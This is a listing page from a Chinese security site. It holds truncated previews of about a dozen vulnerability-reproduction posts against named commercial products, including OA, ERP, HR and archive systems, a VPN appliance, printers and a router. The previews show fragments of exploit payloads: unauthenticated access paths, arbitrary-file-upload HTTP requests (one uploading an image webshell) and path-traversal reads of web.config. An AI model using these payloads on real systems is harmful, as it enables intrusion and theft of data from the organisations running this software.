安全漏洞 - 第 257 | CN-SEC 中文网

安全漏洞

1Sharp-多功能打印机-PermissionAC

S40-1Sharp-多功能打印机-PermissionAC 漏洞复现： payload： /installed_emanual_list.html 效果图：

07月26日33 views已关闭评论

阅读全文

湖南众合百易信息技术有限公司-资产管理运营系统 -任意文件上传

POST /comfileup.php HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r...

07月26日安全漏洞30 views已关闭评论

阅读全文

红海云-EHR系统-任意文件上传

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1 Host: x.x.x.x Accept-Encoding: gzip User-Ag...

07月26日安全漏洞84 views已关闭评论

阅读全文

安全漏洞

奇安信-网神SecSSL3600-PermissionAC

Q1-13奇安信-网神SecSSL3600-PermissionAC 漏洞复现： payload： POST /changepass.php?type=2 HTTP/1.1 host: Cookie:...

07月26日81 views已关闭评论

阅读全文

致远-OA-任意文件上传

Z4-6致远-OA-任意文件上传漏洞复现：上传图片马，返回 fileid 值 payload： POST /seeyon/autoinstall.do/../../seeyon/fileUploa...

07月26日安全漏洞42 views已关闭评论

阅读全文

紫光-电子档案管理系统-PermissionAC

Z17-1紫光-电子档案管理系统-PermissionAC 漏洞复现： payload： /Archive/ErecordOffice/openOfficeFile

07月26日安全漏洞79 views已关闭评论

阅读全文

安全漏洞

用友-U8-Cloud-SQL

Y3-39用友-U8-Cloud-SQL 漏洞描述：用友U8 Cloud MeasureQueryFrameAction接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏...

07月26日17 views已关闭评论

阅读全文

拓尔思-TRSWAS5.0-PermissionAC

T19-1拓尔思-TRSWAS5.0-PermissionAC 漏洞复现： payload： /mas/servlets/uploadThumb?appKey=sv&uploading=1

07月26日安全漏洞94 views已关闭评论

阅读全文

安全漏洞

TOTOLINK-A6000R-RCE

T18-1TOTOLINK-A6000R-RCE 漏洞描述： TOTOLINK A6000R是一款性能卓越的无线路由器，采用先进的技术和设计，为用户提供出色的网络体验。其支持最新的Wi-Fi标准，可实...

07月26日104 views已关闭评论

阅读全文

SuiteCRM-SQL

S39-1SuiteCRM-SQL 漏洞复现： payload： GET /index.php?entryPoint=responseEntryPoint&event=1&delega...

07月26日安全漏洞21 views已关闭评论

阅读全文

赛蓝-企业管理系统-任意文件读取

S38-2赛蓝-企业管理系统-任意文件读取漏洞复现： payload： GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1 Host: Us...

07月26日安全漏洞15 views已关闭评论

阅读全文

赛蓝-企业管理系统-任意文件读取

S38-1赛蓝-企业管理系统-任意文件读取漏洞复现： payload： GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.c...

07月26日安全漏洞9 views已关闭评论

阅读全文

1Sharp-多功能打印机-PermissionAC

湖南众合百易信息技术有限公司-资产管理运营系统 -任意文件上传

红海云-EHR系统-任意文件上传

奇安信-网神SecSSL3600-PermissionAC

致远-OA-任意文件上传

紫光-电子档案管理系统-PermissionAC

用友-U8-Cloud-SQL

拓尔思-TRSWAS5.0-PermissionAC

TOTOLINK-A6000R-RCE

SuiteCRM-SQL

赛蓝-企业管理系统-任意文件读取

赛蓝-企业管理系统-任意文件读取

在线咨询

微信